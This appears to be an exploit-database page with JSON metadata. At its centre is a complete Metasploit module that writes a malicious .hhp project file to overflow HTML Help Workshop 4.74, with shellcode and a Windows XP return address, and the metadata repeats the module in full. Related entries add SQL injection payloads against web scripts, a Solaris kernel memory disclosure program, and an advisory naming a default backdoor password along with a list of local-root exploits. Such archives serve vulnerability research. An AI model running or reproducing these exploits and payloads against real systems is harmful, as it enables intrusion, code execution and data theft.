Search...

HTML Help Workshop 4.74 (hhp Project File) BOF Exploit (Meta)

2009-12-07T00:00:00

ID 1337DAY-ID-8184
Type zdt
Reporter loneferret
Modified 2009-12-07T00:00:00

Description

Exploit for unknown platform in category local exploits

                                        
                                            =========================================================================
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)
=========================================================================



# Title: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)
# CVE-ID: (CVE-2009-0133)
# OSVDB-ID: ()
# Author: loneferret
# Published: 2009-12-07
# Verified: yes

view source
print?
require 'msf/core'
 
class Metasploit3 &lt; Msf::Exploit::Remote
    Rank = GoodRanking
 
    include Msf::Exploit::FILEFORMAT
         
    def initialize(info = {})
        super(update_info(info,
            'Name'           =&gt; 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
            'Description'    =&gt; %q{
                    This module exploits a stack overflow in HTML Help Workshop 4.74
                    By creating a specially crafted hhp file, an an attacker may be able
                    to execute arbitrary code.
            },
            'License'        =&gt; MSF_LICENSE,
            'Author'         =&gt; [ 'loneferret, original by Encrypt3d.M!nd' ],
            'Version'        =&gt; '$Revision: 7724 $',
            'References'     =&gt;
                [
                    [ 'URL', 'http://www.exploit-db.com/exploits/10321' ],
                ],
            'DefaultOptions' =&gt;
                {
                    'EXITFUNC' =&gt; 'thread',
                },                 
            'Payload'        =&gt;
                {
                    'Space'    =&gt; 1000,
                    'BadChars' =&gt; "\x00",
                    'StackAdjustment' =&gt; -4800,
                },
            'Platform' =&gt; 'win',
            'Targets'        =&gt;
                [
                    [ 'Windows XP English SP3', { 'Ret' =&gt; 0x00401F93 } ], # CALL EDI  \x93\x1f\x40\x00
                ],
            'Privileged'     =&gt; false,
            'DisclosureDate' =&gt; 'Dec 05 2009',
            'DefaultTarget'  =&gt; 0))
 
            register_options(
                [
                    OptString.new('FILENAME',   [ false, 'The file name.',  'Devil.hhp']),
                ], self.class)
 
    end
 
    def exploit
 
        sploit = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53\x5D\x0D\x0A\x43\x6F\x6E\x74\x65"
        sploit &lt;&lt; "\x6E\x74\x73\x20\x66\x69\x6C\x65\x3D\x41\x0D\x0A\x49\x6E\x64\x65\x78\x20\x66\x69\x6C\x65\x3D"
        sploit &lt;&lt; "\x41" * 224
        sploit &lt;&lt; "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
        sploit &lt;&lt; "\x42" * 24
        sploit &lt;&lt; [target.ret].pack('V')
        sploit &lt;&lt; "\x0d\x0a\x0d\x0a"
        sploit &lt;&lt; "\x5B\x46\x49\x4C\x45\x53\x5D\x0D"
        sploit &lt;&lt; "\x0d\x0a"
        sploit &lt;&lt; "\x41" * 16
        sploit &lt;&lt; "\x69\x72\x61\x71\x69\x72\x61\x71"
        sploit &lt;&lt; payload.encoded
        sploit &lt;&lt; "\x41" * 4000
  
        hhp = sploit
 
        print_status("Creating '#{datastore['FILENAME']}' file ...")
 
        file_create(hhp)
    end
 
end



#  0day.today [2018-04-14]  #

JSON Vulners Source

Initial Source

{"hash": "16c9401c9057ff948647be6deb8e831418931c2aebb87c39ea62c5634df29c3b", "id": "1337DAY-ID-8184", "lastseen": "2018-04-14T13:52:43", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "794d25465b9e9c2c27de316a206a5fca", "key": "href"}, {"hash": "34e38c137a969670226bd5e8c98c4e54", "key": "modified"}, {"hash": "34e38c137a969670226bd5e8c98c4e54", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "860a27603eca0d137ba8b2b8f58b1f9e", "key": "reporter"}, {"hash": "f8143fbcecba050de5ea1ff96ab79f41", "key": "sourceData"}, {"hash": "1e7bbf96434d6c07af6be7f054ac62fe", "key": "sourceHref"}, {"hash": "1301780a19cbe3fc973960b43ee0a388", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-04-14T13:52:43"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-26839", "1337DAY-ID-10321", "1337DAY-ID-4800", "1337DAY-ID-7724"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28783", "SECURITYVULNS:VULN:4613"]}], "modified": "2018-04-14T13:52:43"}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/8184", "description": "Exploit for unknown platform in category local exploits", "title": "HTML Help Workshop 4.74 (hhp Project File) BOF Exploit (Meta)", "history": [{"bulletin": {"hash": "ee1649c25a86fb9009747e31fadcf913dee3436d447df911a42d115683568f8a", "id": "1337DAY-ID-8184", "lastseen": "2016-04-20T02:09:39", "enchantments": {"score": {"value": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "modified": "2016-04-20T02:09:39"}}, "hashmap": [{"hash": "34e38c137a969670226bd5e8c98c4e54", "key": "published"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3ba5d95b71f082f0141bc67935909675", "key": "sourceHref"}, {"hash": "1301780a19cbe3fc973960b43ee0a388", "key": "title"}, {"hash": "860a27603eca0d137ba8b2b8f58b1f9e", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "25b2d7c49006ffa5a912304b65dc2e31", "key": "href"}, {"hash": "ec7b2e89a2574c3aff2955f8c5baa4e3", "key": "sourceData"}, {"hash": "34e38c137a969670226bd5e8c98c4e54", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/8184", "description": "Exploit for unknown platform in category local exploits", "viewCount": 0, "title": "HTML Help Workshop 4.74 (hhp Project File) BOF Exploit (Meta)", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=========================================================================\r\nHTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)\r\n=========================================================================\r\n\r\n\r\n\r\n# Title: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)\r\n# CVE-ID: (CVE-2009-0133)\r\n# OSVDB-ID: ()\r\n# Author: loneferret\r\n# Published: 2009-12-07\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',\r\n 'Description' => %q{\r\n This module exploits a stack overflow in HTML Help Workshop 4.74\r\n By creating a specially crafted hhp file, an an attacker may be able\r\n to execute arbitrary code.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'loneferret, original by Encrypt3d.M!nd' ],\r\n 'Version' => '$Revision: 7724 $',\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://www.exploit-db.com/exploits/10321' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n }, \r\n 'Payload' =>\r\n {\r\n 'Space' => 1000,\r\n 'BadChars' => \"\\x00\",\r\n 'StackAdjustment' => -4800,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP English SP3', { 'Ret' => 0x00401F93 } ], # CALL EDI \\x93\\x1f\\x40\\x00\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 05 2009',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ false, 'The file name.', 'Devil.hhp']),\r\n ], self.class)\r\n \r\n end\r\n \r\n def exploit\r\n \r\n sploit = \"\\x5B\\x4F\\x50\\x54\\x49\\x4F\\x4E\\x53\\x5D\\x0D\\x0A\\x43\\x6F\\x6E\\x74\\x65\"\r\n sploit << \"\\x6E\\x74\\x73\\x20\\x66\\x69\\x6C\\x65\\x3D\\x41\\x0D\\x0A\\x49\\x6E\\x64\\x65\\x78\\x20\\x66\\x69\\x6C\\x65\\x3D\"\r\n sploit << \"\\x41\" * 224\r\n sploit << \"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8\\x69\\x72\\x61\\x71\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7\"\r\n sploit << \"\\x42\" * 24\r\n sploit << [target.ret].pack('V')\r\n sploit << \"\\x0d\\x0a\\x0d\\x0a\"\r\n sploit << \"\\x5B\\x46\\x49\\x4C\\x45\\x53\\x5D\\x0D\"\r\n sploit << \"\\x0d\\x0a\"\r\n sploit << \"\\x41\" * 16\r\n sploit << \"\\x69\\x72\\x61\\x71\\x69\\x72\\x61\\x71\"\r\n sploit << payload.encoded\r\n sploit << \"\\x41\" * 4000\r\n \r\n hhp = sploit\r\n \r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n \r\n file_create(hhp)\r\n end\r\n \r\nend\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2009-12-07T00:00:00", "references": [], "reporter": "loneferret", "modified": "2009-12-07T00:00:00", "href": "http://0day.today/exploit/description/8184"}, "lastseen": "2016-04-20T02:09:39", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=========================================================================\r\nHTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)\r\n=========================================================================\r\n\r\n\r\n\r\n# Title: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)\r\n# CVE-ID: (CVE-2009-0133)\r\n# OSVDB-ID: ()\r\n# Author: loneferret\r\n# Published: 2009-12-07\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',\r\n 'Description' => %q{\r\n This module exploits a stack overflow in HTML Help Workshop 4.74\r\n By creating a specially crafted hhp file, an an attacker may be able\r\n to execute arbitrary code.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'loneferret, original by Encrypt3d.M!nd' ],\r\n 'Version' => '$Revision: 7724 $',\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://www.exploit-db.com/exploits/10321' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n }, \r\n 'Payload' =>\r\n {\r\n 'Space' => 1000,\r\n 'BadChars' => \"\\x00\",\r\n 'StackAdjustment' => -4800,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP English SP3', { 'Ret' => 0x00401F93 } ], # CALL EDI \\x93\\x1f\\x40\\x00\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 05 2009',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ false, 'The file name.', 'Devil.hhp']),\r\n ], self.class)\r\n \r\n end\r\n \r\n def exploit\r\n \r\n sploit = \"\\x5B\\x4F\\x50\\x54\\x49\\x4F\\x4E\\x53\\x5D\\x0D\\x0A\\x43\\x6F\\x6E\\x74\\x65\"\r\n sploit << \"\\x6E\\x74\\x73\\x20\\x66\\x69\\x6C\\x65\\x3D\\x41\\x0D\\x0A\\x49\\x6E\\x64\\x65\\x78\\x20\\x66\\x69\\x6C\\x65\\x3D\"\r\n sploit << \"\\x41\" * 224\r\n sploit << \"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8\\x69\\x72\\x61\\x71\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7\"\r\n sploit << \"\\x42\" * 24\r\n sploit << [target.ret].pack('V')\r\n sploit << \"\\x0d\\x0a\\x0d\\x0a\"\r\n sploit << \"\\x5B\\x46\\x49\\x4C\\x45\\x53\\x5D\\x0D\"\r\n sploit << \"\\x0d\\x0a\"\r\n sploit << \"\\x41\" * 16\r\n sploit << \"\\x69\\x72\\x61\\x71\\x69\\x72\\x61\\x71\"\r\n sploit << payload.encoded\r\n sploit << \"\\x41\" * 4000\r\n \r\n hhp = sploit\r\n \r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n \r\n file_create(hhp)\r\n end\r\n \r\nend\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "published": "2009-12-07T00:00:00", "references": [], "reporter": "loneferret", "modified": "2009-12-07T00:00:00", "href": "https://0day.today/exploit/description/8184"}

{"zdt": [{"lastseen": "2018-02-15T21:15:20", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-01-30T00:00:00", "published": "2017-01-30T00:00:00", "href": "https://0day.today/exploit/description/26839", "id": "1337DAY-ID-26839", "title": "Video Sharing Script 4.94 - SQL Injection Vulnerability", "type": "zdt", "sourceData": "Exploit Title: Video Sharing Script 4.94 \u2013 SQL Injection\r\nDate: 30.01.2017\r\nVendor Homepage: http://itechscripts.com/\r\nSoftware Link: http://itechscripts.com/video-sharing-script/\r\nExploit Author: Kaan KAMIS\r\nContact: iletisim[at]k2an[dot]com\r\nWebsite: http://k2an.com\r\nCategory: Web Application Exploits\r\n \r\nOverview\r\n \r\nVideo Sharing Script v4.94 is the best audio/ video sharing portal. You can easily deploy the software and launch your own video sharing portal in moments.\r\n \r\nType of vulnerability:\r\n \r\nAn SQL Injection vulnerability in Video Sharing Script 4.94 allows attackers to read\r\narbitrary data from the database.\r\n \r\nVulnerability:\r\n \r\nhttp://localhost/video-sharing-script/watch-video.php?v=67d8ab[payload]\r\n \r\nParameter: #1* (URI)\r\n Type: boolean-based blind\r\n Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause\r\n Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' RLIKE (SELECT (CASE WHEN (1170=1170) THEN 0x363764386162 ELSE 0x28 END))-- Niby\r\n \r\n Type: error-based\r\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\r\n Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND (SELECT 2680 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(2680=2680,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Wovm\r\n \r\n Type: AND/OR time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind\r\n Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND SLEEP(5)-- pcjq\r\n \r\n Type: UNION query\r\n Title: MySQL UNION query (NULL) - 26 columns\r\n Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=-8184' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x757277777751656e7948736349597976767448516b784656504a646a72475952546b6d554251736c,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26839"}, {"lastseen": "2018-03-14T00:26:09", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-12-18T00:00:00", "published": "2009-12-18T00:00:00", "id": "1337DAY-ID-10321", "href": "https://0day.today/exploit/description/10321", "type": "zdt", "title": "Joomla Component City Portal Blind SQL Injection Vulnerability ", "sourceData": "==============================================================\r\nJoomla Component City Portal Blind SQL Injection Vulnerability \r\n==============================================================\r\n\r\n<------------------- header data start ------------------- >\r\n#########################################################################\r\n# Joomla Component City Portal Blind SQL Injection Vulnerability # \r\n#########################################################################\r\n# author : Fl0riX\r\n \r\n# Script Name : Joomla Component City Portal\r\n \r\n# Bug Type : Blind SQL Injection\r\n \r\n# Infection : Admin login bilgileri al�nabilir.\r\n \r\n# Demo Vuln. :\r\n(-)\r\n� http://server/index.php?option=com_content&task=view&id=36&Itemid=1 and 1=0\r\n(+)\r\n� http://server/index.php?option=com_content&task=view&id=36&Itemid=1 and 1=1\r\n \r\n# Bug Fix Advice : Zararl� karakterler filtrelenmelidir.\r\n \r\n#############################################################\r\n \r\n< ------------------- header data end of ------------------- >\r\n \r\n< -- bug code start -- >\r\n \r\npath/index.php?option=com_content&task=view&id=36&Itemid=[Blind SQL]\r\n \r\n< -- bug code end of -- > \r\n\r\n\r\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/10321"}, {"lastseen": "2018-02-21T01:36:59", "bulletinFamily": "exploit", "description": "Exploit for solaris platform in category local exploits", "modified": "2007-09-01T00:00:00", "published": "2007-09-01T00:00:00", "id": "1337DAY-ID-7724", "href": "https://0day.today/exploit/description/7724", "type": "zdt", "title": "Solaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit", "sourceData": "=============================================================\r\nSolaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit\r\n=============================================================\r\n\r\n\r\n\r\n/* 07/2006: public release\r\n * SPARC Solaris 10 without 118833-09\r\n * x86 Solaris 10 without 118855-06\r\n *\r\n * Solaris sysinfo Kernel Memory Disclosure\r\n * By qaaz\r\n */\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <sys/mman.h>\r\n#include <sys/systeminfo.h>\r\n\r\n#define PAGE_COUNT\t1000\r\n\r\nint\tmain(int argc, char *argv[])\r\n{\r\n\tchar\t*buf, *end;\r\n\tint\tpg = PAGE_COUNT, pagesz, bufsz;\r\n\r\n\tfprintf(stderr,\r\n\t\t\"---------------------------------\\n\"\r\n\t\t\" Solaris sysinfo Kmem Disclosure\\n\"\r\n\t\t\" By qaaz\\n\"\r\n\t\t\"---------------------------------\\n\");\r\n\r\n\tif (argc > 1) pg = atoi(argv[1]);\r\n\r\n\tpagesz = getpagesize();\r\n\r\n\tbufsz = (pg + 1) * pagesz;\r\n\tif (!(buf = memalign(pagesz, bufsz))) {\r\n\t\tperror(\"malloc\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tmemset(buf, 0, bufsz);\r\n\tend = buf + (pg * pagesz);\r\n\r\n\tfprintf(stderr, \"-> [ %p .. %p ]\\n\", buf, end);\r\n\tfflush(stderr);\r\n\r\n\tif (mprotect(end, pagesz, PROT_NONE)) {\r\n\t\tperror(\"mprotect\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tsysinfo(SI_SYSNAME, buf, 0);\r\n\r\n\twhile (end > buf && end[-1] == 0)\r\n\t\tend--;\r\n\tfprintf(stderr, \"== %d\\n\", (int) (end - buf));\r\n\tfflush(stderr);\r\n\r\n\tif (!isatty(1))\r\n\t\twrite(1, buf, (size_t) (end - buf));\r\n\treturn 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-02-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7724"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "description": "\r\n\r\n=======\r\nSummary\r\n=======\r\nName: Symantec Messaging Gateway - SSH with backdoor user account + privilege escalation to root due to very old Kernel\r\nRelease Date: 30 November 2012\r\nReference: NGS00267\r\nDiscoverer: Ben Williams <ben.williams@ngssecure.com>\r\nVendor: Symantec\r\nVendor Reference: \r\nSystems Affected: Symantec Messaging Gateway 9.5.3-3\r\nRisk: High\r\nStatus: Published\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 18 April 2012\r\nReleased: 18 April 2012\r\nApproved: 29 April 2012\r\nReported: 30 April 2012\r\nFixed: 27 August 2012\r\nPublished: 30 November 2012\r\n\r\n===========\r\nDescription\r\n===========\r\nI. VULNERABILITY\r\n-------------------------\r\nSymantec Messaging Gateway 9.5.3-3 - SSH with backdoor user account + privilege escalation to root due to very old Kernel\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nSymantec Messaging Gateway 9.5.3-3 is the latest version, of their Email Security Appliance\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nThe "admin" SSH account has a restricted shell, and the password is set by the administrator during setup.\r\n\r\nHowever, there is another SSH account "support" which has a default password, which is not changed during installation, and does not seem to be mentioned in the Symantec documentation as far as I can see (Installation Guide, Administration Guide or Command-line Guide). This account has a very easy-to-guess password, but many administrators may not know it exists.\r\n\r\nAdditionally, the Linux Kernel on the appliance has not been updated since late 2007 (almost 5 years) so suffers from multiple privilege escalation issues (as do other old packages on the operating system) so if SSH is accessible to an attacker, it is possible for them to login and escalate to root.\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nBoth the install wizard and the documentation prompt the administrator to change the password for the "admin" account, for both the UI and for SSH to the operating system. This admin account can SSH in to the appliance, with the new chosen password, and has a restricted shell environment where only certain application administration commands are possible. \r\n\r\nIt is not possible to login as root. However, there is another account "support" which has a default password of "symantec" which is not mentioned anywhere in the installer or documentation (as far as I can see) and the password is not changed as part of the installation process. This account is able to login to the OS via SSH, and does not have a restricted shell environment.\r\n\r\nAdditionally, the Linux Kernel is very old (2007) so suffers from multiple privilege escalation issues.\r\n\r\n[+] Results for kernel version 2.6.18-274.3.1.2.el5_sms\r\n\r\nPotential exploits:\r\n\r\n* Linux Kernel BCM Local Root Exploit\r\n CVE: CVE-2010-2959\r\n Affects kernels: 2.6.0-2.6.36rc1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/14814\r\n\r\n* Linux Kernel RDS protocol Local Root Exploit\r\n CVE: CVE-2010-3904\r\n Affects kernels: 2.6.0-2.6.36rc8\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15285\r\n\r\n* Linux Kernel econet_sendmsg() - half-nelson Local Root Exploit\r\n CVE: CVE-2010-3848 \r\n Affects kernels: 2.6.0-2.6.36.2 \r\n Exploits: \r\n http://www.exploit-db.com/exploits/17787 \r\n \r\n* Linux Kernel Unknown Local Root Exploit \r\n CVE: CVE-None \r\n Affects kernels: 2.6.18-2.6.20\r\n Exploits:\r\n http://www.exploit-db.com/exploits/10613\r\n\r\n* Linux Kernel sock_sendpage() (Wunderbar Emporium) Local Root Exploit\r\n CVE: CVE-2009-2692\r\n Affects kernels: 2.6.0-2.6.31rc3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9641\r\n http://www.exploit-db.com/exploits/9545\r\n http://www.exploit-db.com/exploits/9479\r\n http://www.exploit-db.com/exploits/9436\r\n http://www.exploit-db.com/exploits/9435\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel pipe.c (MooseCox) Local Root Exploit\r\n CVE: CVE-2009-3547\r\n Affects kernels: 2.6.0-2.6.32rc5\r\n Exploits:\r\n http://www.exploit-db.com/exploits/10018\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel ReiserFS xattr Local Root Exploit\r\n CVE: CVE-2010-1146\r\n Affects kernels: 2.6.0-2.6.34rc3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/12130\r\n\r\n* Linux Kernel vmsplice Local Root Exploit\r\n CVE: CVE-2008-0009\r\n Affects kernels: 2.6.17-2.6.24.1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/5092\r\n http://www.exploit-db.com/exploits/5093\r\n\r\n* Linux Kernel ec_dev_ioctl() - half-nelson Local Root Exploit\r\n CVE: CVE-2010-3850\r\n Affects kernels: 2.6.0-2.6.36.2\r\n Exploits:\r\n http://www.exploit-db.com/exploits/17787\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel ACPI custom_method Local Root Exploit\r\n CVE: CVE-2010-4347\r\n Affects kernels: 2.6.0-2.6.37rc2\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15774\r\n\r\n* Linux Kernel ftruncate()/open() Local Root Exploit\r\n CVE: CVE-2008-4210\r\n Affects kernels: 2.6.0-2.6.22\r\n Exploits:\r\n http://www.exploit-db.com/exploits/6851\r\n\r\n* Linux Kernel put_user() - full-nelson Local Root Exploit\r\n CVE: CVE-2010-4258\r\n Affects kernels: 2.6.0-2.6.37\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel sock_no_sendpage() - full-nelson Local Root Exploit\r\n CVE: CVE-2010-3849\r\n Affects kernels: 2.6.0-2.6.37\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel ipc - half-nelson Local Root Exploit\r\n CVE: CVE-2010-4073\r\n Affects kernels: 2.6.0-2.6.37rc1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/17787\r\n\r\n* Linux Kernel SELinux/RHEL5 (Cheddar Bay) Local Root Exploit\r\n CVE: CVE-None\r\n Affects kernels: 2.6.9-2.6.30\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9208\r\n http://www.exploit-db.com/exploits/9191\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel exit_notify() Local Root Exploit\r\n CVE: CVE-2009-1337\r\n Affects kernels: 2.6.0-2.6.29\r\n Exploits:\r\n http://www.exploit-db.com/exploits/8369\r\n\r\n* Linux Kernel system call emulation Local Root Exploit\r\n CVE: CVE-2007-4573\r\n Affects kernels: 2.6.0-2.6.22.7\r\n Exploits:\r\n http://www.exploit-db.com/exploits/4460\r\n\r\n* Linux Kernel set_selection() UTF-8 Off By One Local Root Exploit\r\n CVE: CVE-2009-1046\r\n Affects kernels: 2.6.0-2.6.28.3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9083\r\n\r\n===============\r\nFix Information\r\n===============\r\n\r\nAn updated version of the software has been released to address the vulnerability:\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00\r\n\r\nNCC Group Research\r\nhttp://www.nccgroup.com/research\r\n\r\n\r\nFor more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>\r\nThis email message has been delivered safely and archived online by Mimecast.\r\n</a>\r\n", "modified": "2012-12-02T00:00:00", "published": "2012-12-02T00:00:00", "id": "SECURITYVULNS:DOC:28783", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28783", "title": "NGS000267 Technical Advisory: Symantec Messaging Gateway SSH with backdoor user account plus privilege escalation to root due to very old Kernel", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:19", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, etc.", "modified": "2005-04-03T00:00:00", "published": "2005-04-03T00:00:00", "id": "SECURITYVULNS:VULN:4613", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4613", "title": "PHP, ASP, CGI web applications security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}